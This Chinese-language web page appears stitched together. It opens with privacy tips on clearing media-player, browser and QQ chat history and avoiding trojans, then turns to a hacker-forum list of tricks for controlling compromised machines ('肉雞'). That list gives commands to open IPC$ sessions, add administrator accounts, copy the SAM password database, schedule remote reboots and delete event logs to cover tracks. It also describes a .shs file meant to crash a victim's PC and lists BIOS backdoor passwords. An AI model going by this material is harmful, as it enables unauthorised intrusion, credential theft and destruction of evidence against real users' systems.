變通的解決辦法是:在看完這些視頻片斷之後,把文件的擴展名改為Realplayer或者媒體播放器等不支持的虛假擴展名。例如你剛才看的視頻文件名字叫做123.mpeg,你可以把它的文件名改為sdk.dhl,然後把它重新藏到其他不起眼的文件夾中,最好遠離原來的文件夾。雖然原先的記錄還保存在「文件」菜單中,但是Realplayer、媒體播放器已經找不到該文件了。下次你要再次觀看時,可以重新把文件的擴展名修改回來。修改文件擴展名對於隱藏其他類型的文件也是一個簡單有效的辦法,雖然這種辦法並不很保險,但對於很多人而言,這種辦法已經能基本滿足要求了。相比之下Yahoo!Player在這方面就做得好得多,你可以到Yahoo!Player的「Edit→Prefenrence→General」中勾選「On exit,clear history(退出時清除歷史記錄)」,這樣以後你每次關閉Yahoo!Player就會自動清除歷史記錄。 #1三、IE瀏覽器 如果你是上網用戶,更要小心你的秘密被泄露了。IE瀏覽器會記錄你訪問過的站點的地址,別人可以通過歷史記錄來查看。 解決辦法:如果你不想讓別人知道你的行蹤,可以通過點擊瀏覽器「工具→Internet選項→常規」選項卡中「清除歷史記錄」。 對於那些通過登錄Web收發電子郵件的用戶來說,你所看過的信別人可以輕易看到,這是一個極其嚴重卻被廣泛忽視的安全問題。那些在網吧上網的人士要特別小心了,說不定你前腳剛走,那些別具用心的人就來偷看你的秘密了。通過點擊瀏覽器的「歷史」按鈕,可以看到最近一段時間所訪問頁的記錄。在先選擇「離線工作」的情況下,再點擊有關E-mail的頁面,別人就可以看到你曾看過的信! 解決辦法:要消除這個漏洞,僅靠清除歷史記錄是不夠的,別人即使通過歷史記錄看不到你的訪問記錄了,但是可以到C:WindowsTemporary Internet Files文件夾中去查看全部內容。關鍵就是把這個文件夾中的內容清除,你可以點擊瀏覽器「工具」→「Internet選項」之「常規」選項卡中的「刪除文件」來刪除所有的離線內容。 你可能會發現,當你用滑鼠點擊電子郵件的用戶名登錄框時,會列出曾經輸入過的電子郵件地址;當你點擊電子郵件的主題欄時,可能會列出曾經輸入過的郵件標題;當你在論壇中的寫帖子時的標題欄中也會列出曾經輸入過的一些標題。所有這些表單中的信息都有可能會泄露你不想他人知道的信息。IE瀏覽器具有的「自動完成」功能存儲了以前曾鍵入過的條目,因此當你下次填寫表單的時候,會自動列出可能相符的項。 解決辦法:要清除記錄,可點擊IE瀏覽器的「工具」→「Internet選項」→「內容」選項卡中的「自動完成」,然後點「清除表單」來清除自動完成歷史記錄。 #1四、網路聊天與郵件 當你在聊天室、論壇中胡說八道的時候,別以為沒有人知道你來自何方,你的IP地址早已經被記錄在案。當你用QQ聊天時,別人也有辦法知道你的IP地址,只要到網上下載安裝一個查IP地址的小工具,就可以看到你的IP地址,然後通過「追捕」軟體查出你是哪個地方的(誤報可能性大),所以別奇怪有人怎麼會知道你的地理方位。 解決方案:如要想隱藏自己的IP地址,最有效的還是通過代理伺服器上網。 如今網路黑客工具(木馬程序)的泛濫,使得很多並非真正黑客的人也可以遠程控制你的計算機,竊取你的信息。當別人用QQ或者E-mail向你發相片或者歌曲的時候,說不定你正在接收一個木馬程序。計算機如果中了木馬程序後,就沒有什麼秘密可言了。 解決方案:要防範黑客程序,除了不要下載來路不明的軟體外,安裝防火牆和反病毒程序是最有效的措施。如果你對網路安全性異常敏感,還應注意對Windows系統的安全漏洞打補丁。 你不但要防範來自網上的危險,你更要防範來自現實中的竊密者。在更多的情況下,你周圍的人才是真正最危險的人。現在很多人都用QQ來聊天,也正是QQ成為泄露你秘密的主要渠道。針對QQ的竊密工具很多,可以偷竊密碼、偷看聊天記錄等,簡直讓人防不勝防。 解決方案:如果是網吧等公共場所使用QQ,聊天后最好把聊天記錄刪除。刪除聊天記錄主要有兩種辦法,如果你對電腦不太熟悉,可以點擊QQ的「消息管理」,在彈出的「消息管理器」窗口中用右鍵點擊你的號碼(在左上角),然後點「刪除消息」,就可以刪除全部聊天記錄,如果你覺得這些聊天記錄對你很重要想要保存它,你可以在「消息管理」中,用右鍵點擊自己的號碼,再點擊「導出聊天記錄為文本文件」,把它們備份到軟盤上或發到自己的郵箱保存後再刪除硬碟上的聊天記錄。有一定電腦使用經驗的用戶,可以採取第二種方法:到QQ所在的安裝目錄C:\Program Files\Tencent,刪除以你自己的QQ號碼命名的文件夾,別忘了還要清空回收站哦!從硬碟上刪除該文件夾比第一種辦法好,因為除了刪除聊天記錄外,還可在「一定程度上」防止他人用破解QQ密碼的工具從這個文件夾中偷竊你的密碼,請注意只是「在一定程度上」,因為還可以通過其他途徑來偷竊密碼。 在公共場所上網,要小心QQ號碼被盜,可QQ號碼被盜的現象依然不斷。 解決方案:要防止QQ的密碼被盜,還應注意幾點:應儘快將QQ升級到更安全更完善的最新版本。此外最好不要以生日、 名字、電話號碼等個人信息來作為密碼,密碼要複雜,不定期更換,當然也要方便你記憶。最好是數字加英文加標點符號,8∽16位最合適。如果你的密碼長度很短或者太簡單的時候,就容易被QQ密碼猜解器在短時間內猜解出來。設置完密碼後可以到騰訊網站申請密碼保護功能,被盜後方便取回密碼。 如今網上流傳一些QQ密碼竊取軟體,運行它之後,在你輸入密碼登錄QQ的同時記錄密碼到某個文件中,對這類軟體很難防範,你不僅僅要注意QQ的密碼被盜,你的其他密碼也要小心被盜。很多人為了圖省事,電子郵件和QQ是同一密碼,但這樣做存在嚴重的安全隱患,因為一旦一個密碼被竊,就全線失守了。要完全防範別人偷你的密碼,真的很不容易。最可怕的是一些在後台秘密監視計算機活動的軟體,這些監視軟體可以記錄你使用電腦的所有過程,包括你的所有鍵盤鍵入,當然你的密碼也都通通被記錄(包括QQ密碼、E-mail密碼在內的所有密碼全都暴露無遺)。要發現這類軟體的蹤跡很難,這類程序運行時,按「Ctrl+Alt+Del」也無法看到,反病毒軟體也不監控這類軟體。目前沒有很好的辦法來發現這類監視軟體。 解決方案:到控制面板中的「添加/刪除程序」屬性中,看看裡面有沒有什麼可疑的程序;另外就是從「開始」菜單中的「運行」中鍵入「msconfig」,在打開的「系統配置程序」之「啟動」項中,查查有沒有可疑的啟動項。但是這些辦法,都很不可靠。要比較徹底發現這類程序,可以使用winkill之類的內存駐留監控程序來監測有沒有異常的情況,但是使用winkill來發現這類軟體要求對計算機比較熟悉,使用起來也不方便,而且winkill只能發現可疑者而不能判斷它究竟是不是「監視軟體」。要防範這類程序真的很難,讓你防不勝防,稍不注意你的秘密就全被暴露。你還有秘密嗎?其實你已經沒有了……推薦]網上信息安全的防範技巧十三法 二十世紀九十年代末出現的INTERNET標誌著人類社會已經進入了信息化時代,在這個時代,越來越多的人已經開始離不開Internet網路。然而在現有的Internet的環境中,君子風度和信任感已經所剩無幾了。社會上能找到的所有的兇險, 卑鄙和投機, Internet上應有盡有。從Internet誕生之日起, 特別是自90年代它向公眾開放以來, 它已經成為眾矢之的。尤其是在一些電子商務網站進行購物,或者希望註冊成為某些網站的會員的時候,我們要特別注意保護自己個人信息在網上的安全。這是因為我們通過表格來註冊和提交個人信息時,程序會把這些信息打包發送到目的地,在傳送到目的地的過程中需要經過一系列的網站中轉,當然被傳送的信息就很容易在所經過的網路上留下自己的蹤跡,如果這些蛛絲馬跡不幸被某些別有用心的人截獲並加以利用,麻煩可就大了--雖然這種幾率比較低,但面對如今一無法規二無規則、尚顯無序的網路,總應該多加小心。下面,筆者就為各個用戶提供一些保護網上信息安全的方法措施,希望能夠對各位用戶。 1、不輕易運行不明真相的程序 如果你收到一封帶有附件的電子郵件,且附件是擴展名為EXE一類的文件,這時千萬不能貿然運行它,因為這個不明真相的程序,就有可能是一個系統破壞程序。攻擊者常把系統破壞程序換一個名字用電子郵件發給你,並帶有一些欺騙性主題,騙你說一些:「這是個好東東,你一定要試試」,「幫我測試一下程序」之類的話。你一定要警惕了!對待這些表面上很友好、跟善意的郵件附件,我們應該做的是立即刪除這些來歷不明的文件。 2、屏蔽小甜餅信息 小甜餅就是Cookie,它是Web伺服器發送到電腦里的數據文件,它記錄了諸如用戶名、口令和關於用戶興趣取向的信息。實際上,它使你訪問同一站點時感到方便,比如,不用重新輸入口令。但Cookies收集到的個人信息可能會被一些喜歡搞「惡作劇」的人利用,它可能造成安全隱患,因此,我們可以在瀏覽器中做一些必要的設置,要求瀏覽器在接受Cookie之前提醒您,或者乾脆拒絕它們。通常來說,Cookie會在瀏覽器被關閉時自動從計算機中刪除,可是,有許多Cookie會一反常態,始終存儲在硬碟中收集用戶的相關信息,其實這些Cookie就是被設計成能夠駐留在我們的計算機上的。隨著時間的推移,Cookie信息可能越來越多,當然我們的心境也因此變得越來越不踏實。為了確保萬無一失,對待這些已有的Cookie信息應該從硬碟中立即清除,並在瀏覽器中調整Cookie設置,讓瀏覽器拒絕接受Cookie信息。屏蔽Cookie的操作步驟為:首先用滑鼠單擊菜單欄中的「工具」菜單項,並從下拉菜單中選擇「Internet選項」;接著在選項設置框中選中「安全」標籤,並單擊標籤中的「自定義級別」按鈕;同時在打開的「安全設置」對話框中找到關於Cookie的設置,然後選擇「禁用」或「提示」。 3、不同的地方用不同的口令 對於經常上網的用戶,可能會發現在網上需要設置密碼的情況有很多。有很多用戶圖方便記憶,不論在什麼地方,都使用同一個口令,殊不知他們已不知不覺地留下了一個安全隱患。因為攻擊者一般在破獲到用戶的一個密碼後,會用這個密碼去嘗試用戶每一個需要甬道口令的地方!想想看,別人用一個口令慢慢地盜用你的帳號上網;再去偷看與冒發你的E-mail;也許還會用你的身份去聊天室損害你的形象;還有.....,想想看那後果該有多嚴重呀!所以筆者強烈建議各位用戶,每個不同的地方用不同的密碼,一定不能不同,同時要把各個對應的密碼記下來,以備日後查用。另外一點就是我們在設定密碼時,不應該使用字典中可以查到的單詞,也不要使用個人的生日,最好是字母、符號和數字混用,多用特殊字元,諸如%、&、#、和$,並且在允許的範圍內,越長越好,以保證你的密碼不易被人猜中。 4、 屏蔽ActiveX控制項 由於ActiveX控制項可以被嵌入到HTML頁面中,並下載到瀏覽器端加以執行,因此會給瀏覽器端造成一定程度的安全威脅。目前已有證據表明,在客戶端的瀏覽器中,如IE中插入某些ActiveX控制項,也將直接對伺服器端造成意想不到的安全威脅。同時,一些其他技術,如內嵌於IE的VB Script語言,用這種語言生成的客戶端可執行的程序模塊,也同 Java小程序一樣,有可能給客戶端帶來安全性能上的漏洞。此外,還有一些新技術,如ASP(Active serv er Pages)技術,由於用戶可以為ASP的輸出隨意增加客戶腳本、ActiveX控制項和動態HTML,因此在ASP腳本中同樣也都存在著一定的安全隱患。所以,用戶如果要保證自己在網際網路上的信息絕對安全,可以屏蔽掉這些可能對計算機安全構成威脅的ActiveX控制項,具體操作步驟為:首先用滑鼠單擊菜單欄中的「工具」菜單項,並從下拉菜單中選擇「Internet選項」;接著在選項設置框中選中「安全」標籤,並單擊標籤中的「自定義級別」按鈕;同時在打開的「安全設置」對話框中找到關於ActiveX控制項的設置,然後選擇「禁用」或「提示」。 5、定期清除緩存、歷史記錄以及臨時文件夾中的內容 我們在上網瀏覽信息時,瀏覽器會把我們在上網過程中瀏覽的信息保存在瀏覽器的相關設置中,這樣下次再訪問同樣信息時可以很快地達到目的地,從而提高了我們的瀏覽效率。但是瀏覽器的緩存、歷史記錄以及臨時文件夾中的內容保留了我們太多的上網的記錄,這些記錄一旦被那些無聊的人得到,他們就有可能從這些記錄中尋找到有關個人信息的蛛絲馬跡。為了確保個人信息資料的絕對安全,我們應該定期清理緩存、歷史記錄以及臨時文件夾中的內容。清理瀏覽器緩存並不麻煩,具體的操作方法如下:首先用滑鼠單擊菜單欄中的「工具」菜單項,並從下拉菜單中選擇「Internet選項」;接著在選項設置框中選中「常規」標籤,並單擊標籤中的「刪除文件」按鈕來刪除瀏覽器中的臨時文件夾中的內容;然後在同樣的餓對話框中單擊「清除歷史記錄」按鈕來刪除瀏覽器中的歷史記錄和緩存中的內容。 6、不隨意透露任何個人信息 在網上瀏覽信息時,經常會發現需要用戶註冊自己個人信息資料的表單。這些站點通過程序設計達到一種不填寫表單就不能獲取自己需要的信息的目的。面對這種強迫用戶註冊個人信息的情況,我們最好的辦法是不要輕易把自己真實的信息提交給他們,特別是不要向任何人透露你的密碼。還有,在使用ICQ、OICQ等網路軟體以及註冊免費E-mail信息的時候,我們都需要填寫一些個人資料。某些資料是必須填寫的,自然無法略過。但是對於可填可不填但又涉及自己隱私的資料,還是能免就免,您有權利保持沉默,否則您所說的一切,有可能在網路上被黑客利用。這一沉默原則同樣適用於聊天室,在弄清楚聊天室的環境和各個人物之前,使用虛擬的網名應該是明智的選擇。你應該注意你常去的地方是不是把你的IP地址顯示了出來,特別是在一些聊天室里,你一定要小心了!可能攻擊你的人就是這樣才能控制你的。因為我們撥號上網的用戶IP是動態的,你每次上網的IP是伺服器隨機分配給你的,所以自己的IP如果不讓人知道,是不會遭到襲擊的。 7、突遇莫名其妙的故障時要及時檢查系統信息 上網過程中,突然覺得計算機工作不對勁時,彷彿感覺有人在遙遠的地方遙控你。這時,你必須及時停止手中的工作,立即按Ctrl+Alt+Del複合鍵來查看一下系統是否運行了什麼其他的程序,一旦發現有莫名其妙的程序在運行,你馬上停止它,以免對整個計算機系統有更大的威脅。但是並不是所有的程序運行時出現在程序列表中,有些程序例如Back Orifice(一種黑客的後門程序)並不顯示在Ctrl+Alt+Del複合鍵的進程列表中,所以如果你的計算機中運行的是WIN98或者WIN2000操作系統,最好運行「附件」/「系統工具」/「系統信息」,然後雙擊「軟體環境」,選擇「正在運行任務」,在任務列表中尋找自己不熟悉的或者自己並沒有運行的程序,一旦找到程序後應立即終止它,以防後患
推薦閱讀:
epair目錄中也同樣有一個SAM文件(這個是前者的備份!)如果你在登陸肉雞的時候,copy前面那個目錄中的SAM文件,你會發現COPY不下來!呵呵,為什麼?因為運行著的2K系統會保護SAM文件啊~這個時候你就COPY這個就可以了!10)ping不到,tracert不到,但是卻能用nbtstat顯示對方的一些信息,為什麼?因為tracert和ping命令使用的是ICMP協議!而nbtstat是通過對方的netbios埠來獲得對方的主機信息的!使用的是UDP和TCP協議!如果對方僅僅只對ICMP協議做了禁止的話,那通過這個命令獲得系統信息是正常的!11)telnet上去後,如何給對方開共享?開共享的命令如下:net share c=c:winntsystem 返回共享成功之後直接利用\ipc來訪問對方的system目錄了~刪除共享用share c /del 命令就可以了12)如何判斷對方的具體操作系統版本?首先用ver命令查看對方的版本號!如果是5.00.2195的話,為2K;5.1.2600為XP從這裡可以區分出來到底是2K還是XP了~下面進行更加具體的區分!2K的pro和svr版本區分:在telnet下,net shart查看啟動的服務~如果對方開啟了Terminal Services服務的話,基本上可以判斷為svr以上的版本了~如果沒有開啟,則為pro!(具體方法有三種,因為前幾天在論壇中我回復過暗界了~所以這裡就不再重複了~)XP的pro和home版的區分:home edition是無法安裝iis的!所以,可以通過iis服務來判斷到底是home版或者是pro了~當然了,如果對方是pro,但是將iis刪除(停用)的話,就沒辦法判斷了~呵呵13)如何查看98的隨機啟動的程序?在98下有一個實用配置程序(msconfig),中文名為:系統配置實用程序,調用的方法是在:開始--運行中輸入msconfig,在裡面,有一個啟動的選項卡,點擊後,可以看到很多隨即啟動程序,如果前面帶有鉤的話,就是啟動時隨機啟動的,取消的話就是把前面的小鉤去掉就可以了~(如果在這裡查看到了一些未知的啟動文件--比如沒有文件的具體路徑,或者沒有文件名的話,最好取消它的自啟動!因為很有可能是木馬!)除了這裡以外,還有config.sys、autoexec.bat、system.ini、win.ini幾個選項卡,他們分別對應這幾個文件!只不過在這裡更方便查看而已!14)設置了BIOS密碼,可是卻忘記了,該怎麼辦?如果是可以進入Windows的話,可以找找biospwds和cmospwd這兩個軟體看看~還有利用DEBUG法:簡單介紹兩種:1)-o 70 16-o 71 13-q2)-o 70 16-o 71 16-q另一種方法:copy法:copy con cmos.com輸入下面10個字元:alt+176,alt+17,alt+230, p,alt+176,alt+20,alt+230,q,alt+205,空格,然後按下F6並回車,退出,運行這個cmos.com程序就可以了~恩,如果不能進入Windows怎麼辦呢?簡單介紹兩種方法:1)用通用密碼:Award Bios密碼:j256,LKW-PPETER,wantgirl,EBBB,Syxz,AWARD? SW,AWARD_SW,j262,HLT SER,SKY_FOX,BIOSTAR,ALFARO_ME,lkwpeter,589721,awkard,h996,CONCAT,589589AMI bios密碼:AMI,BIOS,PASSWORD,HEWITT RAND,AMI_SW,LKWPETER,A.M.I.這是常見的密碼,不妨試試~如果不行的話,可以利用CMOS放電:就是把主板上的電池取下來,等一會兒再插上去~15)如何自製一個讓98藍屏的炸彈?恩,這個是前幾天QQ上面朋友問我的問題,整理的時候突然間想起來了,就寫一下好了~首先,打開Word,再插入菜單中選擇對象,這時,彈出對象包裝程序窗口,再這個窗口中,點擊導入,隨便找一個文本或者程序就可以!之後點:編輯菜單。這裡選擇命令行,出現一個命令行窗口,在裡面協商c:concon,點擊保存,完成後,再點編輯包中的複製包,把他隨便到一個地方複製下來,之後看到的是一個名位片斷的東西!給這個文件起一個名字,呵呵,傳給那個可憐的傢伙吧,等待他藍屏,掉線!(這個命令行中可以插入很多的命令,不見得非要用這個98藍屏漏洞哦~)順便說一下:這個已經不是什麼新鮮的技術了,這個技術的名字叫做:碎片對象。呵呵,碎片?記憶碎片么?不是的!他的後綴是:.shs!之所以說一下這個,是因為有的朋友還不知道~做一個整理而已!不知道的朋友看過後就知道了,知道的朋友就權當複習了~另外,不要利用這個方法做破壞!否則後果自負!16)如何再命令行下殺死對方進程?利用微軟的2K以上操作系統都是含有這個工具的!該工具包含在2K光碟的support ools文件夾下!裡面有安裝程序,點擊後,就安裝了2K的support tools工具包,裡面有kill這個工具,這時候再cmd下可以輸入kill/?,就可以看到幫助了,使用這個命令的格式是:kill pid (pid是進程的ID號!)再任務管理器中可以看到進程的ID號!(不知道有幾位朋友用過藍色火焰?呵呵,用法跟這個一摸一樣!還有很多類似的木馬、後門軟體都有類似的功能!這個是windows自帶的大木馬『後門工具』而已!)這時候,有朋友問了,那再命令行下如何查看進程呢?呵呵,這就用到了系統自帶的有一個後門工具了:再剛才說得那個目錄中,還有一個工具叫tlist 看名字就能看出來是幹什麼的吧?用法更簡單!直接輸入tlist就可以得到pid遇隊形程序的列表了~那對方機器如果沒有安裝這兩個程序怎麼辦呢?沒關係,你把你操作系統盤符下面programfilessupport tools目錄下面的這兩個對應的exe文件上傳到對方的winntsystem32目錄中就可以了!呵呵~17)上次說了ping的基本用法,這次談談ping的命令參數!這個是本次問題集的重點部分!無論是小鳥還是老鳥,你們能保證你真的對這些參數了如指掌么?恐怕都未必!還是好好看看吧!這是TCP/IP協議中最有用的命令之一 它給另一個系統發送一系列的數據包,該系統本身又發回一個響應,這條實用程序對查找遠程主機很有用,它返回的結果表示是否能到達主機,宿主機發送一個返回數據包需要多長時間。 Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS] [-r count] [-s count] [[-j host-list] [-k host-list]] [-w timeout] destination-list Options: -t Ping the specifed host until interrupted.(除非人為中止,否則一直ping下去) -a Resolve addresses to hostnames.(把IP轉為主機名) -n count Number of echo requests to send.(響應請求的數量) -l size Send buffer size.(封包的大小) -f Set Don`t Fragment flag in packet.(信息包中無碎片) -i TTL Time To Live.(時間) -v TOS Type Of Service.(服務類型) -r count Record route for count hops. -s count Timestamp for count hops. -j host-list Loose source route along host-list. -k host-list Strict source route along host-list.(較嚴格的……唉,怎麼譯好……算了,放著吧) -w timeout Timeout in milliseconds to wait for each reply.(timeout的時間) 比如大家可能都知道的一個命令 # ping -f -s 65000 ***.***.***.***或者前階段大家所謂ping死霉國佬時所用的命令(當然這樣只會造成我方自己的網路阻塞)。 其實這個命令主要是用來看對方應答的速度,如果怎麼ping 得到的結果都是request time out。那恐怕你根本就不用你去找這台主機了,它不在你的射程之內。 18)如何查看本機的DNS伺服器?ipconfig其實是可以的(呵呵,上次就介紹過這個命令),除此以外,還可以利用一個命令:再cmd下輸入netsh,進入到netsh>提示符,再輸入:int ip 進入到interface ip> 然後再次輸入dump,這時候屏幕上出現當前連接的配置情況了這裡必須介紹一下netsh到底是作什麼用的!這個命令比較複雜,他包含了很多的子命令,所以這裡只對部分命令進行講解:1)查看本機IP:首先鍵入netsh,再netsh>提示符下輸入:interface 回車 之後:ip 回車 再之後:show address 回車 這樣,就可以看到當前連接的IP地址和子網掩碼。(其實這個命令不如ipconfig簡單,也不如ipconfig/all全面)2)修改網路配置:接著上面的命令,我們使用:set address name=「本地連接」 source=static addr=192.168.0.200 mask=255.255.255.0,這樣就修改了當前的IP地址,用show address來看看(或者用ipconfig)3)顯示一個完整的網路配置教本:剛才說過,第一個命令顯示的信息不如ipconfig/all全面,不用著急,netsh再列印顯示網路配置上,還是有自己的特色的!例如:再interface ip>狀態下輸入:dump,會顯示一個清單,顯示所有本地連接(不管你是否使用~)與netstat -an不完全一樣!這就是netsh的簡單介紹和最基礎的用法!希望大家能夠掌握!還可以輸入?來查看幫助!(要在netsh>提示符下才能查看幫助啊~)19)肉雞上的部分文件無法刪除,怎麼辦?如果對方的文件夾是只讀的話,會出現拒絕訪問的字樣!這時候,我們可以再del命令後面加上/f參數來刪除!20)再說一個可以限制用戶登陸時間的命令!再net命令中就可以實現這樣的功能!具體方法如下:假如我們打算讓:coldcrysky這個用戶再周日到周易的上午八點到下午四點之間可以登陸,用這個命令:net user coldcrysky /timesunday-monday,08:00-16:00之後利用net user coldcrysky命令來查看登陸時間的限制,可以看到是我們所規定的時間(因為是中文的,很容易懂,我就不多廢話了)在此,特別提醒各位:命令中:星期日才是一周的開始!!!不要當成星期一!光說了怎麼設置,如果想恢復回去怎麼辦呢?(就是恢復成默認狀態,任何時間都可以登陸的狀態)看我的:net user coldcrysky /time:all --這樣就可以了~22)如何刪除windows2K的默認貢獻?首先打開記事本,輸入如下內容:net share c$ /deletenet share d$ /deletenet share e$ /deletenet share f$ /deletenet share g$ /deletenet share ipc$ /deletenet share admin$ /delete這裡的c$、d$、e$……是代表默認共享的盤符~又幾個就設置幾個就可以了~之後點擊保存成批處理文件(後綴為:bat的文件!)!加入到啟動組中就可以了~23)139埠的又一用法呵呵,寫這個帖子的原因是因為我答應給一個朋友回復139埠的作用來著……先聲明兩點:1)不要利用本帖所提到的方法去搞惡意破壞!2)呵呵,可能許多人已經知道了139埠這個用法了~本文只想起到一個拋磚引玉的作用!廢話不多說了~開始:如果你使用NT主機的話,那你可要注意了!重啟NT主機的方法如下:1:Net use \XXX.XXX.XXX.XXXipc$ "password" /user:"username"建立一個IPC連接2:net use H: \XXX.XXX.XXX.XXXC$將對方的C盤映射為自己的h盤3:copy c on h:
eboot.batIisreset /rebootCTRL+Z在對方的C盤上生成一個能重啟機器的文件4:net time \XXX.XXX.XXX.XXX得到對方機器時間5:at \XXX.XXX.XXX.XXX 重啟的時間 c:
eboot.bat設定對方重啟的時間!6:at \XXX.XXX.XXX.XXX查看任務上面是否添加了這個任務7:等對方重啟好了~上面的第三步是only for Win2K的,如果是Nt,就需要用意個指定的重啟程序,我們可以自己編寫一個reboot.exe來代替reboot.bat,代碼如下:#include "stdio.h"#include "windows.h"int main(){文件://定義重啟的時候發送給所有用戶的消息LPSTR msg="Reboot Tool By LionHook
http://www.xici.net";;文件://嘗試用最簡單的API函數重啟if(ExitWindowXXX(EWX_REBOOT.0))return TRUE;if(ExitWindowXXX(EWX_REBOOT | EWX_FORCE,0))return TRUE;文件://因為上面的重啟不成功,所以需要調整本進程的特權HANDLE hToken;TOKEN_PRIVILEGES tkp;if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |TOKEN_QUERY,&hToken)) return FALSE;文件://獲取重啟的特權 SE_SHUTDOWN_NAMELookupPrivilegevalues(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);tkp.PrivilegeCount=1;tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(POTKEN_PRIVILEGES)NULL,0);文件://判斷是NT內核還是9X內核,選擇用不同的方式if(!GetVersion()& 0x80000000))InitiateSystemShutdown(NULL,msg,20,TRUE,TRUE);else if (!ExitWindowXXX(EWX_REBOOT,0))if(!ExitWindowXXX(EWX_REBOOT|EWX_FORCE,0))return FALSE;return TRUE;對了,再次說明啊,別用本文提到的方法搞破壞,小心警察叔叔打PP~呵呵24)利用批處理文件來建立一個記錄3389登陸者信息的記錄器由於Terminal Service默認是沒有日誌記錄的,只能依靠他的系統日誌,但是系統日誌只能記錄一些大動作(開啟或停止服務),那麼,如何用批處理文件來編寫一個將是3389埠的程序呢?很簡單:建立一個批處理文件:內容如下:@echo offdate/t >> c:3389log.txt:TS3389time/t >> c:3389log.txtnetstat -an | find "3389" |find "ESTABLISHED" >>c:3389log.txtgoto :TS3389之後保存!如果有人用你的3389登陸你的機器,呵呵,在c盤下就有3389log.txt這個文件!記錄了當天日誌,還有連接時間……資料~開始反擊~呵呵25)網路命令小節A、NET命令:IPC連接:格式 net use \對方IPipc$ "密碼" user:"用戶名" 『建立IPC連接~』net use \對方IPipc$ /delete 『斷開連接~』以下操作需要在連接到對方主機後才可進行!!!net user coldcrysky xyz /add 『在連接的目標主機中加入一個用戶名為COLDCRYSKY 密碼為WYZ的用戶』net localgroup Administrator coldcrysky /add 『把名為coldcrysky的用戶加入ADMIN組-以為著許可權的提高啊!!!^_^』net use z:\對方IPC$ 『把對方的C盤映射為本機的Z盤-可依照需要更改映射盤符!』net start telnet 『開啟TELNET』net user guest /active:yes 『激活GUEST』net user guest coldcrysky 『把GUEST密碼改為COLDCRYSKY』B、AT命令:查看遠程機時間:net time \對方IP加入一項新任務:at \對方IP 時間 文件名 『用來把自己上傳的後門程序在制定時間運行,方便以後進入肉雞!』C、TELNET命令:telnet 對方IP 埠 『作用不用我說了吧???』D、FTP命令:登陸:ftp 對方網址(IP地址)上傳文件:get 文件在本機完整路徑 對方文件存放完整路徑下載文件:put 對方文件完整路徑 本機存放文件路徑E、COPY命令:在建立連接後(尤其是IPC$連接後,很有用的命令哦~)⑴copy index.htm \127.0.0.1c$index.htm『將本機index.htm文件複製到127.0.0.1的C盤下,如果要放到對方的NT目錄下,則把C改為admin$』⑵copy \127.0.0.1admin
epairsam_ c: 『將遠程機資料庫文件拷貝到本機C盤根目錄下』F、SET命令:主要用於分析目標計算機的基本信息用!具體使用方法請查找相關文件!G、NBTSTAT命令:nbtstat -A 對方IP (這個A大寫)『在其中顯示<037>前面的英文或數字就是計算機名稱!當然,也可以利用PING -A 對方ip的方法來查看對方主機名!效果相同!!!』H、SHUTDOWN命令:『用來關閉對方NT服務的命令』格式如下:shutdown \IP地址 t:20『20秒後自動關閉對方NT服務!由於對對方機器影響較大,慎用!!!』I、DIR命令:還用我說么?大家是不是早就該掌握了???(不知道的還是查閱相關資料吧~~~)J、ECHO命令:echo coldcrysky >index.htm 『用coldcrysky覆蓋掉原INDEX.HTM中所有內容』echo coldcrysky >>index.htm 『把coldcrysky加入到index.htm中』K、ATTRIB命令:更改文件屬性用,格式:Attrib -r index.htm 『去掉只讀屬性』(+- 分別代表增加和減少)L、DEL命令:『刪除日誌的時候用!』del c:winntsystem32logfiles*.*del c:winntsystem32config*.evtdel c:winntsystem32dtclog*.*del c:winntsystem32*.logdel c:winntsystem32*.txtdel c:winnt*.txtdel c:winnt*.logM、PING命令:-t :ping制定IP,知道網路斷開或按CTRL+C結束!-a :解釋PING IP的主機名-n count :發送count指定的ECHO數據包,默認為4個!26)這裡我必須(或者說不得不重新重申一個命令!不過說之前我要把這個命令的相關命令稍微介紹一下!)我要說的命令就是:開啟服務和停止服務的net start and net stop這兩個命令大多數朋友已經很熟悉了吧?不過為了方便更多的菜鳥能看明白我要說的意思,不用再看其他相關文章,所以我簡單說兩句:net start是開啟服務!那麼,如何開啟呢?比如,我們這裡要開啟telnet服務,那就直接再2K的cmd下輸入:net start telnet就OK了~關閉一項服務的話,把start換成stop就OK了~不過這裡必須要注意:你所關閉的服務必須是已經開啟的服務!!!好像是一句廢話OK,有了這個前提後,下面就繼續介紹:那麼,net start和net stop到底能開啟什麼服務?其實這點也不需要你強記,記住這個命令就可以了:net help start和net help stop,這兩個會顯示出你所能開啟的服務有那些~~這裡比如我們查到了這個服務「CLIENT SERVICE FOR NETWARE」,那麼當這個命令使用net start和net stop的時候,你必須在這項服務上面加上「」,原因是因為這個服務名稱中帶有空格!如果服務名稱中不帶空格,你可以不用帶這個引號!!!這點是我強調的問題!大家一定不要忘記了!『前些天看到S8S8.net的黑白新區中有人說net start 和 net stop後面的服務名必須帶空格是錯誤的!明白原因了吧?』27)關於雙系統的兩個問題:A、如何在雙系統(98、2000)中安全刪除2K?先製作一張Windows 98 的啟動軟盤,再用它啟動你的計算機,運行sys命令恢復Windows 98引導記錄後,再運行fdisk/mbr恢復主引導記錄,完成後進入Windows 98,把winnt 和system volumn information 目錄刪除,再刪掉C盤上的boot.ini、bootfont.bin、ntldr、nydetect.com、bootsect.dos文件就行了。B、 Windows 98/XP雙系統啟動菜單修復1.修復前,在BIOS中設置從光碟機啟動。用Windows XP安裝盤啟動電腦,在載入必要的驅動後,出現Windows XP的安裝界面。有三個選項:(1)要現在開始安裝Windows XP,請按「Enter」鍵。(2)要用「恢復控制台」修復Windows XP安裝,按「R」鍵。(3)要退出安裝程序,不安裝Windows XP,按「F3」鍵;2. 按「R」鍵,進入「Microsoft Windows XP (TM) 故障恢復控制台」界面;故障恢復控制台提供系統修復和故障恢復功能。系統這時會搜尋已安裝的Windows XP系統文件,然後顯示搜尋結果,並詢問「要登錄到哪個Windows XP安裝(要取消,請按Enter)」,選擇1. D:Windows,回車,系統會再詢問「管理員密碼」,再鍵入安裝Windows 